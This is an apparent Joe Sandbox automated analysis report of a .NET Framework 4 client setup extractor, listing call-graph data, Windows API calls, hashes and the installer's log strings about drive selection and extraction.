18367->18370 18373 2b17f 18367->18373 18381 2e861 18367->18381 18369->18365 18418 2df49 18369->18418 18370->18373 18390 2e813 18370->18390 18373->18361 18373->18362 18375 2e8c8 18374->18375 18376 2e8dd 18374->18376 18377 2b059 __fclose_nolock 66 API calls 18375->18377 18376->18355 18378 2e8cd 18377->18378 18379 2affd __fclose_nolock 11 API calls 18378->18379 18380 2e8d8 18379->18380 18380->18355 18382 2e86e 18381->18382 18383 2e87d 18381->18383 18384 2b059 __fclose_nolock 66 API calls 18382->18384 18385 2e89b 18383->18385 18386 2b059 __fclose_nolock 66 API calls 18383->18386 18389 2e873 18384->18389 18385->18370 18387 2e88e 18386->18387 18388 2affd __fclose_nolock 11 API calls 18387->18388 18388->18389 18389->18370 18391 2dbda __malloc_crt 66 API calls 18390->18391 18392 2e828 18391->18392 18392->18373 18394 2e746 _raise 18393->18394 18395 2e769 18394->18395 18396 2e74e 18394->18396 18397 2e775 18395->18397 18402 2e7af 18395->18402 18443 2b071 18396->18443 18399 2b071 __close 66 API calls 18397->18399 18401 2e77a 18399->18401 18404 2b059 __fclose_nolock 66 API calls 18401->18404 18446 31a49 18402->18446 18403 2b059 __fclose_nolock 66 API calls 18412 2e75b _raise 18403->18412 18406 2e782 18404->18406 18408 2affd __fclose_nolock 11 API calls 18406->18408 18407 2e7b5 18409 2e7c3 18407->18409 18410 2e7d7 18407->18410 18408->18412 18456 2e038 18409->18456 18411 2b059 __fclose_nolock 66 API calls 18410->18411 18414 2e7dc 18411->18414 18412->18365 18416 2b071 __close 66 API calls 18414->18416 18415 2e7cf 18515 2e806 18415->18515 18416->18415 18419 2df55 _raise 18418->18419 18420 2df66 18419->18420 18424 2df82 18419->18424 18421 2b071 __close 66 API calls 18420->18421 18423 2df6b 18421->18423 18422 2df8e 18425 2b071 __close 66 API calls 18422->18425 18428 2b059 __fclose_nolock 66 API calls 18423->18428 18424->18422 18427 2dfc8 18424->18427 18426 2df93 18425->18426 18429 2b059 __fclose_nolock 66 API calls 18426->18429 18430 31a49 ___lock_fhandle 68 API calls 18427->18430 18436 2df73 _raise 18428->18436 18431 2df9b 18429->18431 18432 2dfce 18430->18432 18433 2affd __fclose_nolock 11 API calls 18431->18433 18434 2dff8 18432->18434 18435 2dfdc 18432->18435 18433->18436 18438 2b059 __fclose_nolock 66 API calls 18434->18438 18437 2debf __lseeki64_nolock 68 API calls 18435->18437 18436->18365 18439 2dfed 18437->18439 18440 2dffd 18438->18440 18557 2e029 18439->18557 18441 2b071 __close 66 API calls 18440->18441 18441->18439 18444 2a6d5 __getptd_noexit 66 API calls 18443->18444 18445 2b076 18444->18445 18445->18403 18447 31a55 _raise 18446->18447 18448 31aaf 18447->18448 18449 2d1bd __lock 66 API calls 18447->18449 18450 31ad1 _raise 18448->18450 18451 31ab4 EnterCriticalSection 18448->18451 18452 31a81 18449->18452 18450->18407 18451->18450 18453 31a9d 18452->18453 18454 31a8a InitializeCriticalSectionAndSpinCount 18452->18454 18518 31adf 18453->18518 18454->18453 18457 2e047 __write_nolock 18456->18457 18458 2e09c 18457->18458 18459 2e07d 18457->18459 18488 2e072 18457->18488 18462 2e0f8 18458->18462 18463 2e0db 18458->18463 18460 2b071 __close 66 API calls 18459->18460 18464 2e082 18460->18464 18461 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 18465 2e733 18461->18465 18467 2e10b 18462->18467 18522 2debf 18462->18522 18466 2b071 __close 66 API calls 18463->18466 18468 2b059 __fclose_nolock 66 API calls 18464->18468 18465->18415 18469 2e0e0 18466->18469 18472 2e861 __flsbuf 66 API calls 18467->18472 18471 2e089 18468->18471 18473 2b059 __fclose_nolock 66 API calls 18469->18473 18474 2affd __fclose_nolock 11 API calls 18471->18474 18475 2e114 18472->18475 18476 2e0e8 18473->18476 18474->18488 18477 2e3b6 18475->18477 18479 2a753 __getptd 66 API calls 18475->18479 18478 2affd __fclose_nolock 11 API calls 18476->18478 18480 2e666 WriteFile 18477->18480 18481 2e3c5 18477->18481 18478->18488 18483 2e12f GetConsoleMode 18479->18483 18484 2e699 GetLastError 18480->18484 18509 2e398 18480->18509 18482 2e480 18481->18482 18490 2e3d8 18481->18490 18497 2e48d 18482->18497 18505 2e55a 18482->18505 18483->18477 18486 2e158 18483->18486 18484->18509 18485 2e6e4 18485->18488 18491 2b059 __fclose_nolock 66 API calls 18485->18491 18486->18477 18487 2e168 GetConsoleCP 18486->18487 18487->18509 18511 2e18b 18487->18511 18488->18461 18489 2e422 WriteFile 18489->18484 18489->18490 18490->18485 18490->18489 18490->18509 18493 2e707 18491->18493 18492 2e6b7 18495 2e6c2 18492->18495 18496 2e6d6 18492->18496 18499 2b071 __close 66 API calls 18493->18499 18494 2e5cb WideCharToMultiByte 18494->18484 18501 2e602 WriteFile 18494->18501 18500 2b059 __fclose_nolock 66 API calls 18495->18500 18535 2b089 18496->18535 18497->18485 18498 2e4fc WriteFile 18497->18498 18497->18509 18498->18484 18498->18497 18499->18488 18503 2e6c7 18500->18503 18504 2e639 GetLastError 18501->18504 18501->18505 18507 2b071 __close 66 API calls 18503->18507 18504->18505 18505->18485 18505->18494 18505->18501 18505->18509 18507->18488 18508 2f7d3 78 API calls __fassign 18508->18511 18509->18485 18509->18488 18509->18492 18510 31b19 WriteConsoleW CreateFileW __write_nolock 18510->18511 18511->18484 18511->18508 18511->18509 18511->18510 18512 2e237 WideCharToMultiByte 18511->18512 18514 2e2bc WriteFile 18511->18514 18532 2f82f 18511->18532 18512->18509 18513 2e268 WriteFile 18512->18513 18513->18484 18513->18511 18514->18484 18514->18511 18556 31aed LeaveCriticalSection 18515->18556 18517 2e80c 18517->18412 18521 2d0da LeaveCriticalSection 18518->18521 18520 31ae6 18520->18448 18521->18520 18540 319db 18522->18540 18524 2dedd 18525 2def6 SetFilePointer 18524->18525 18526 2dee5 18524->18526 18528 2deea 18525->18528 18529 2df0e GetLastError 18525->18529 18527 2b059 __fclose_nolock 66 API calls 18526->18527 18527->18528 18528->18467 18529->18528 18530 2df18 18529->18530 18531 2b089 __dosmaperr 66 API calls 18530->18531 18531->18528 18553 2f7f2 18532->18553 18536 2b071 __close 66 API calls 18535->18536 18537 2b094 _free 18536->18537 18541 31a00 18540->18541 18542 319e8 18540->18542 18544 2b071 __close 66 API calls 18541->18544 18548 31a3f 18541->18548 18543 2b071 __close 66 API calls 18542->18543 18545 319ed 18543->18545 18547 31a11 18544->18547 18546 2b059 __fclose_nolock 66 API calls 18545->18546 18549 319f5 18546->18549 18550 2b059 __fclose_nolock 66 API calls 18547->18550 18548->18524 18549->18524 18551 31a19 18550->18551 18552 2affd __fclose_nolock 11 API calls 18551->18552 18552->18549 18554 292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 18553->18554 18556->18517 18560 31aed LeaveCriticalSection 18557->18560 18559 2e031 18559->18436 18560->18559 18561->16631 18563 18cb2 18562->18563 18564 18cac 18562->18564 18566 18ce9 18563->18566 18580 19a43 GetProcessHeap HeapSize 18563->18580 18579 19a43 GetProcessHeap HeapSize 18564->18579 18568 18cee 18566->18568 18576 18d08 18566->18576 18581 18836 18568->18581 18569 18ccc 18571 18577 18569->18571 18572 18cde lstrlenA 18569->18572 18571->16639 18571->16645 18572->18566 18574 18cfe 18574->18571 18575 18d94 18574->18575 18574->18576 18577 18836 4 API calls 18574->18577 18575->18571 18578 18e6f 3 API calls 18575->18578 18576->18574 18576->18575 18586 33517 18576->18586 18577->18574 18578->18571 18579->18563 18580->18569 18582 18870 18581->18582 18583 18847 18581->18583 18582->18574 18584 18861 GetProcessHeap HeapAlloc 18583->18584 18585 18850 GetProcessHeap HeapReAlloc 18583->18585 18584->18582 18585->18582 18589 33466 18586->18589 18590 33482 18589->18590 18591 33497 18589->18591 18593 2b059 __fclose_nolock 66 API calls 18590->18593 18592 334bb 18591->18592 18594 334a6 18591->18594 18604 2eaec 18592->18604 18595 33487 18593->18595 18596 2b059 __fclose_nolock 66 API calls 18594->18596 18598 2affd __fclose_nolock 11 API calls 18595->18598 18599 334ab 18596->18599 18602 33492 18598->18602 18601 2affd __fclose_nolock 11 API calls 18599->18601 18600 334e9 18600->18602 18603 2b0db __flsbuf 97 API calls 18600->18603 18601->18602 18602->18576 18603->18602 18605 292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 18604->18605 18606 2eb53 18605->18606 18607 2eb57 18606->18607 18609 2e8bc __fclose_nolock 66 API calls 18606->18609 18620 2eb8e __aulldvrm __woutput_l _strlen 18606->18620 18608 2b059 __fclose_nolock 66 API calls 18607->18608 18610 2eb5c 18608->18610 18609->18620 18611 2affd __fclose_nolock 11 API calls 18610->18611 18612 2eb67 18611->18612 18613 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 18612->18613 18614 2f673 18613->18614 18614->18600 18615 2f7f2 __isleadbyte_l 76 API calls 18615->18620 18616 31e55 97 API calls _write_string 18616->18620 18617 2c318 _free 66 API calls 18617->18620 18618 2eef4 18619 2f1e3 _DecodePointerInternal 18618->18619 18622 2dbda __malloc_crt 66 API calls 18618->18622 18624 2ef31 18618->18624 18621 2f232 18619->18621 18620->18607 18620->18612 18620->18615 18620->18616 18620->18617 18620->18618 18628 2ea73 97 API calls _write_string 18620->18628 18629 31e33 78 API calls __cftof 18620->18629 18623 2f25e 18621->18623 18625 2f24c _DecodePointerInternal 18621->18625 18622->18624 18626 2f27f 18623->18626 18627 2f26d _DecodePointerInternal 18623->18627 18624->18619 18625->18623 18626->18600 18627->18626 18628->18620 18629->18620 18631 19926 10 API calls 18630->18631 18632 19c39 18631->18632 18633 19c42 DeleteFileW 18632->18633 18640 19c76 18632->18640 18634 19c4d GetLastError 18633->18634 18633->18640 18636 19c5a 18634->18636 18634->18640 18635 19c95 18635->16674 18638 19c5f MoveFileExW 18636->18638 18636->18640 18637 18e6f 3 API calls 18637->18635 18639 19c6e GetLastError 18638->18639 18638->18640 18639->18640 18640->18635 18640->18637 18642 19926 10 API calls 18641->18642 18643 192e9 18642->18643 18644 1952f 18643->18644 18645 192f8 GetFileAttributesW 18643->18645 18646 19550 FindClose 18644->18646 18647 1955c 18644->18647 18648 19325 18645->18648 18649 19319 GetLastError 18645->18649 18646->18647 18650 19570 18647->18650 18651 18e6f 3 API calls 18647->18651 18648->18644 18653 1958e 18648->18653 18654 19366 18648->18654 18655 19349 SetFileAttributesW 18648->18655 18649->18648 18652 19574 RemoveDirectoryW 18650->18652 18650->18653 18651->18650 18652->18653 18656 19584 GetLastError 18652->18656 18657 195ab 18653->18657 18660 18e6f 3 API calls 18653->18660 18654->18652 18654->18653 18659 18889 7 API calls 18654->18659 18655->18654 18658 1935a GetLastError 18655->18658 18656->18653 18661 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 18657->18661 18658->18654 18662 19399 18659->18662 18660->18657 18663 195ba 18661->18663 18662->18647 18664 18abb 6 API calls 18662->18664 18663->16672 18665 193b5 18664->18665 18665->18647 18666 193bf FindFirstFileW 18665->18666 18667 193dd GetLastError 18666->18667 18676 193e9 18666->18676 18667->18676 18668 18889 7 API calls 18668->18676 18669 19509 FindNextFileW 18670 19524 GetLastError 18669->18670 18669->18676 18670->18644 18671 18abb 6 API calls 18671->18676 18672 194e1 DeleteFileW 18672->18669 18675 194f1 GetLastError 18672->18675 18673 194b8 SetFileAttributesW 18673->18672 18674 194c9 GetLastError 18673->18674 18674->18676 18675->18676 18676->18644 18676->18647 18676->18668 18676->18669 18676->18671 18676->18672 18676->18673 18677 192bb 15 API calls 18676->18677 18677->18676 18679 18dc6 18678->18679 18680 18dcb FormatMessageW 18678->18680 18679->18680 18681 18e12 18680->18681 18682 18def GetLastError 18680->18682 18684 18889 7 API calls 18681->18684 18683 18dfb 18682->18683 18685 18e24 LocalFree 18683->18685 18686 15d40 18683->18686 18684->18683 18685->18686 18686->16706 18686->16707 18707 33923 18687->18707 18689 18518 18690 1848d 18689->18690 18691 1849b 18690->18691 18692 184c0 18691->18692 18693 1870c 117 API calls 18691->18693 18694 1870c 18692->18694 18693->18692 18695 18c9a 112 API calls 18694->18695 18696 1872e 18695->18696 18697 18735 lstrlenA 18696->18697 18706 1879a 18696->18706 18699 18770 18697->18699 18700 1874b WriteFile 18697->18700 18698 18535 18698->16722 18703 18775 WriteFile 18699->18703 18699->18706 18701 18768 18700->18701 18702 187be GetLastError 18700->18702 18701->18699 18701->18700 18702->18706 18705 1878d GetLastError 18703->18705 18703->18706 18704 18e6f 3 API calls 18704->18698 18705->18706 18706->18698 18706->18704 18708 33943 18707->18708 18709 3392e 18707->18709 18710 33951 18708->18710 18713 3395e 18708->18713 18711 2b059 __fclose_nolock 66 API calls 18709->18711 18714 2b059 __fclose_nolock 66 API calls 18710->18714 18712 33933 18711->18712 18715 2affd __fclose_nolock 11 API calls 18712->18715 18723 33854 18713->18723 18722 33956 18714->18722 18717 3393e 18715->18717 18717->18689 18718 2affd __fclose_nolock 11 API calls 18720 33994 18718->18720 18720->18689 18721 2b059 __fclose_nolock 66 API calls 18721->18722 18722->18718 18724 33872 18723->18724 18725 3388a 18723->18725 18726 2b059 __fclose_nolock 66 API calls 18724->18726 18727 33899 18725->18727 18733 338ae 18725->18733 18728 33877 18726->18728 18729 2b059 __fclose_nolock 66 API calls 18727->18729 18730 2affd __fclose_nolock 11 API calls 18728->18730 18731 3389e 18729->18731 18734 33882 18730->18734 18732 2affd __fclose_nolock 11 API calls 18731->18732 18732->18734 18733->18734 18735 2b0db __flsbuf 97 API calls 18733->18735 18734->18720 18734->18721 18735->18734 18739 29927 18736->18739 18738 29a98 18740 29933 _raise 18739->18740 18741 2d1bd __lock 61 API calls 18740->18741 18742 2993a 18741->18742 18744 29965 _DecodePointerInternal 18742->18744 18747 299e4 18742->18747 18746 2997c _DecodePointerInternal 18744->18746 18744->18747 18753 2998f 18746->18753 18762 29a52 18747->18762 18749 29a61 _raise 18749->18738 18750 29a49 18752 297f1 __mtinitlocknum 3 API calls 18750->18752 18754 29a52 18752->18754 18753->18747 18755 299a6 _DecodePointerInternal 18753->18755 18759 299b5 _DecodePointerInternal _DecodePointerInternal 18753->18759 18760 2a539 _EncodePointerInternal 18753->18760 18756 29a5f 18754->18756 18767 2d0da LeaveCriticalSection 18754->18767 18761 2a539 _EncodePointerInternal 18755->18761 18756->18738 18759->18753 18760->18753 18761->18753 18763 29a58 18762->18763 18765 29a32 18762->18765 18768 2d0da LeaveCriticalSection 18763->18768 18765->18749 18766 2d0da LeaveCriticalSection 18765->18766 18766->18750 18767->18756 18768->18765 18769 16a56 18770 16b1d 18769->18770 18771 16a6f 18769->18771 18772 16b76 GetDlgItem 18770->18772 18774 16b29 18770->18774 18771->18772 18773 16a75 18771->18773 18775 16b6e SendMessageW 18772->18775 18776 16b88 GetLastError 18772->18776 18777 16b14 PostQuitMessage 18773->18777 18778 16a7f 18773->18778 18779 16abb 18774->18779 18780 16b34 GetDlgItem 18774->18780 18775->18779 18788 16b52 18776->18788 18777->18779 18782 16af0 18778->18782 18783 16a84 18778->18783 18780->18775 18784 16b46 GetLastError 18780->18784 18799 16be1 EnterCriticalSection 18782->18799 18786 16ac3 18783->18786 18787 16a8b 18783->18787 18784->18788 18789 16adc SetEvent 18786->18789 18792 16ad4 SetWindowTextW 18786->18792 18787->18779 18795 16be1 12 API calls 18787->18795 18791 1854a 118 API calls 18788->18791 18789->18779 18794 16bb4 18791->18794 18792->18789 18793 16b08 KiUserCallbackDispatcher 18793->18779 18794->18779 18796 16bba EndDialog 18794->18796 18797 16aa6 18795->18797 18796->18779 18797->18779 18798 16aae SendMessageA 18797->18798 18798->18779 18800 16c01 18799->18800 18801 16c3d LeaveCriticalSection 18799->18801 18800->18801 18804 19166 6 API calls 18800->18804 18802 16af8 18801->18802 18803 16c4b 18801->18803 18802->18779 18802->18793 18805 18e6f 3 API calls 18803->18805 18806 16c1a MessageBoxW 18804->18806 18805->18802 18806->18801 18807 16c33 18806->18807 18807->18801

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 0001774A Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 244COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 127 1774a-17782 call 17cd0 130 17784-17793 call 187eb 127->130 131 177a7-177ca call 184c7 call 187eb 127->131 130->131 136 17795-177a2 call 1854a 130->136 140 177d6-177ec GetLogicalDriveStringsW 131->140 141 177cc-177d1 131->141 146 179ef-179f2 136->146 144 17819-1781b 140->144 145 177ee-177f8 GetLastError 140->145 143 179d8-179df call 1854a 141->143 163 179e0-179e5 143->163 151 17834-1783b 144->151 152 1781d-1782a call 187eb 144->152 149 17808 145->149 150 177fa-17806 145->150 147 179f4-179f7 call 18e6f 146->147 148 179fc-17a02 146->148 147->148 155 1780a 149->155 156 1780f-17814 149->156 150->149 159 17841-17869 CharUpperW call 184c7 call 295a3 151->159 160 17958-1795d 151->160 152->141 166 1782c-17832 GetLogicalDriveStringsW 152->166 155->156 156->143 171 1786b 159->171 172 1787f-1788b call 17a0a 159->172 161 179d3 160->161 161->143 163->146 167 179e7-179ea call 18e6f 163->167 166->151 167->146 173 17870-17872 call 184c7 171->173 178 17891-17895 172->178 179 1795f-17964 172->179 177 17877-1787a 173->177 180 1792b-17930 177->180 181 17897-1789d 178->181 182 1789f-178a9 call 1768d 178->182 179->143 183 17932-1793b 180->183 181->173 188 178b2-178bb call 17ae7 182->188 189 178ab-178b0 182->189 183->183 185 1793d-17948 183->185 185->159 187 1794e-17951 185->187 191 17953-17956 187->191 192 1796d-17976 187->192 198 178c1-178c4 188->198 199 17966-1796b 188->199 189->173 191->160 191->192 194 17978 192->194 195 179ab-179ae 192->195 200 1797a-1797d 194->200 201 1797f-17989 call 184c7 194->201 196 179b0 195->196 197 179ce 195->197 202 179b2-179b5 196->202 203 179b7-179cc call 184c7 196->203 197->161 204 178c6-178cc 198->204 205 178ce-178f1 GetDiskFreeSpaceExW 198->205 199->143 200->195 200->201 209 1798e-17991 201->209 202->197 202->203 213 17994-179a2 call 18889 203->213 204->173 205->180 208 178f3-178fd 205->208 211 17916-17919 208->211 212 178ff-17902 208->212 209->213 211->180 215 1791b 211->215 212->211 214 17904 212->214 213->163 222 179a4-179a9 213->222 217 17906-17909 214->217 218 1790b-17914 214->218 219 17922-17928 215->219 220 1791d-17920 215->220 217->211 217->218 218->180 219->180 220->180 220->219 222->143
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
                                                                                                                                                                      • Part of subcall function 000187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
                                                                                                                                                                    • GetLogicalDriveStringsW.KERNELBASE(0000009C,?,00000000,00000000,X?f,?,?,00016F09,?,?,00000000,?,?,00015B53,?,?), ref: 000177E5
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00016F09,?,?,00000000,?,?,00015B53,?,?,?,?,?,X?f), ref: 000177EE
                                                                                                                                                                    Strings
                                                                                                                                                                    • Drive '%S' has been selected as the largest removable drive, xrefs: 000179BA
                                                                                                                                                                    • Unable to allocate a string for extracion drive, xrefs: 000179A4
                                                                                                                                                                    • Failed to dtermine whether a drive can be written to, xrefs: 00017966
                                                                                                                                                                    • Failed to get logical drives, xrefs: 0001780F
                                                                                                                                                                    • Drive '%S' is rejected because it can't be written to, xrefs: 000178C7
                                                                                                                                                                    • X?f, xrefs: 00017755
                                                                                                                                                                    • Failed to allocate memory for logical drives, xrefs: 000177CC
                                                                                                                                                                    • Unable to get the drive type, xrefs: 0001795F
                                                                                                                                                                    • Drive '%S' is rejected because it's a resource of a cluster, xrefs: 0001786B
                                                                                                                                                                    • Insufficient size on any available drives, xrefs: 000179CE
                                                                                                                                                                    • Cluster drive map: '%S', xrefs: 000177AA
                                                                                                                                                                    • Considering drive: '%S'..., xrefs: 00017849
                                                                                                                                                                    • Drive '%S' is rejected because it's not a hard disk or RAM disk, xrefs: 000178AB
                                                                                                                                                                    • Drive '%S' has been selected as the largest fixed drive, xrefs: 00017982
                                                                                                                                                                    • Unable to allocate the cluster drive map, xrefs: 00017795
                                                                                                                                                                    • Drive '%S' is rejected because of the unknown or unsuitable drive type, xrefs: 00017898
                                                                                                                                                                    • Failed to find any drive to extract to, xrefs: 00017958
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocDriveErrorLastLogicalProcessStrings
                                                                                                                                                                    • String ID: Cluster drive map: '%S'$Considering drive: '%S'...$Drive '%S' has been selected as the largest fixed drive$Drive '%S' has been selected as the largest removable drive$Drive '%S' is rejected because it can't be written to$Drive '%S' is rejected because it's a resource of a cluster$Drive '%S' is rejected because it's not a hard disk or RAM disk$Drive '%S' is rejected because of the unknown or unsuitable drive type$Failed to allocate memory for logical drives$Failed to dtermine whether a drive can be written to$Failed to find any drive to extract to$Failed to get logical drives$Insufficient size on any available drives$Unable to allocate a string for extracion drive$Unable to allocate the cluster drive map$Unable to get the drive type$X?f
                                                                                                                                                                    • API String ID: 3325457267-4183805676
                                                                                                                                                                    • Opcode ID: a266fab7baba1c7c36e1cb4a94ace23acb950bbf03821c4c0317d903aacecd1f
                                                                                                                                                                    • Instruction ID: ea6d5c5ac43819c31067588e8d76e075bdb084180df4a7d946d53a5a1ba2a15c
                                                                                                                                                                    • Opcode Fuzzy Hash: a266fab7baba1c7c36e1cb4a94ace23acb950bbf03821c4c0317d903aacecd1f
                                                                                                                                                                    • Instruction Fuzzy Hash: 5381B331D48215ABCF21AF94D881AEEB7F6BF44710F21402AE50DB7151EB719AC5CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000159A6 Relevance: 40.5, APIs: 11, Strings: 12, Instructions: 239COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 223 159a6-159fc GetModuleHandleW call 16c5c 226 15a08-15a0e 223->226 227 159fe-15a03 223->227 229 15a14-15ac3 call 291e9 call 2de40 call 2921c PathRemoveExtensionW call 2de40 GetEnvironmentVariableW call 29284 call 18889 226->229 230 15ad8-15ade call 18417 226->230 228 15bbf-15bc6 call 1854a 227->228 239 15bc7-15bd2 call 168fb 228->239 280 15ac5-15aca 229->280 281 15acf-15ad6 229->281 234 15ae3-15afa call 160af 230->234 244 15b06-15b1d call 16123 234->244 245 15afc-15b01 234->245 247 15bd4 call 1a414 239->247 248 15bd9-15be1 239->248 258 15b29-15b2f 244->258 259 15b1f-15b24 244->259 245->228 247->248 252 15be3-15be8 248->252 253 15bea-15bef call 16463 248->253 256 15bf4-15bf6 252->256 253->256 261 15c07-15c27 call 184c7 call 18e9c 256->261 262 15bf8-15bfe 256->262 264 15b31-15b35 258->264 265 15b37 258->265 259->228 282 15c29-15c39 call 184c7 261->282 283 15c3c-15c42 261->283 262->261 266 15c00-15c02 call 15cda 262->266 264->265 268 15b41-15b57 call 16ef5 264->268 265->268 266->261 277 15b60-15b87 #17 GetTickCount call 1621f 268->277 278 15b59-15b5e 268->278 290 15b90-15ba0 GetTickCount call 15945 277->290 291 15b89-15b8e 277->291 278->228 280->228 281->230 281->234 282->283 287 15c44-15c48 call 18e6f 283->287 288 15c4d-15c5b 283->288 287->288 293 15c6b-15c72 288->293 294 15c5d-15c64 CloseHandle 288->294 290->239 304 15ba2-15baf call 15e0b 290->304 291->228 296 15c80-15c87 293->296 297 15c74-15c7a call 18e6f 293->297 294->293 300 15c89-15c8a call 18e6f 296->300 301 15c8f-15c96 296->301 297->296 300->301 302 15c98-15c99 call 18e6f 301->302 303 15c9e-15ca5 301->303 302->303 308 15ca7-15ca8 call 18e6f 303->308 309 15cad-15caf 303->309 314 15bb4-15bb8 304->314 308->309 312 15cb1-15cb5 309->312 313 15cb7-15cb9 309->313 315 15cbe-15cd2 call 291d5 312->315 313->315 314->239 316 15bba 314->316 316->228
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 000159E3
                                                                                                                                                                      • Part of subcall function 00016C5C: GetCommandLineW.KERNEL32(?,00000000,X?f), ref: 00016C76
                                                                                                                                                                      • Part of subcall function 00016C5C: CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00016C84
                                                                                                                                                                      • Part of subcall function 00016C5C: GetLastError.KERNEL32 ref: 00016C91
                                                                                                                                                                    • _wcsrchr.LIBCMT ref: 00015A1C
                                                                                                                                                                    • _memset.LIBCMT ref: 00015A37
                                                                                                                                                                    • PathRemoveExtensionW.SHLWAPI(?), ref: 00015A58
                                                                                                                                                                    • _memset.LIBCMT ref: 00015A72
                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(temp,?,00000104), ref: 00015A88
                                                                                                                                                                    • swprintf.LIBCMT ref: 00015AA3
                                                                                                                                                                      • Part of subcall function 00016463: GetProcessHeap.KERNEL32(00000000,00000000,74DF23A0,?,00015BF4), ref: 000164A0
                                                                                                                                                                      • Part of subcall function 00016463: HeapFree.KERNEL32(00000000,?,00015BF4), ref: 000164A7
                                                                                                                                                                    • CloseHandle.KERNEL32(000001D0), ref: 00015C5E
                                                                                                                                                                      • Part of subcall function 00018E6F: GetProcessHeap.KERNEL32(00000000,?,?,000185A8,00000000,00000000,?,?,00016A49,00000000,Failed while running the progress dialog.), ref: 00018E79
                                                                                                                                                                      • Part of subcall function 00018E6F: HeapFree.KERNEL32(00000000,?,000185A8,00000000,00000000,?,?,00016A49,00000000,Failed while running the progress dialog.), ref: 00018E80
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$CommandFreeHandleLineProcess_memset$ArgvCloseEnvironmentErrorExtensionLastModulePathRemoveVariable_wcsrchrswprintf
                                                                                                                                                                    • String ID: === Logging stopped: %S ===$Exiting with result code: 0x%x$Failed to allocate log$Failed to execute file$Failed to extract$Failed to initialize arguments$Failed to open the box$Failed to select and/or prepare the directory for extraction$Unable to estimate the required size$X?f$\dd_%s_decompression_log.txt$temp
                                                                                                                                                                    • API String ID: 4209647820-3904233393
                                                                                                                                                                    • Opcode ID: d0d7af7843404f762197a7aa38e70e410f9e70d15105335d0117e9f2172ef730
                                                                                                                                                                    • Instruction ID: a254cab9ada6639f27b9b635d032c1583735c3dcfd9c80c4794463e1c55e16ee
                                                                                                                                                                    • Opcode Fuzzy Hash: d0d7af7843404f762197a7aa38e70e410f9e70d15105335d0117e9f2172ef730
                                                                                                                                                                    • Instruction Fuzzy Hash: 5A812272508741EFD722EF64DC86EEA73E9ABC4701F000929F254DB192DB75D9C48B92
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001621F Relevance: 22.7, APIs: 6, Strings: 9, Instructions: 191memoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
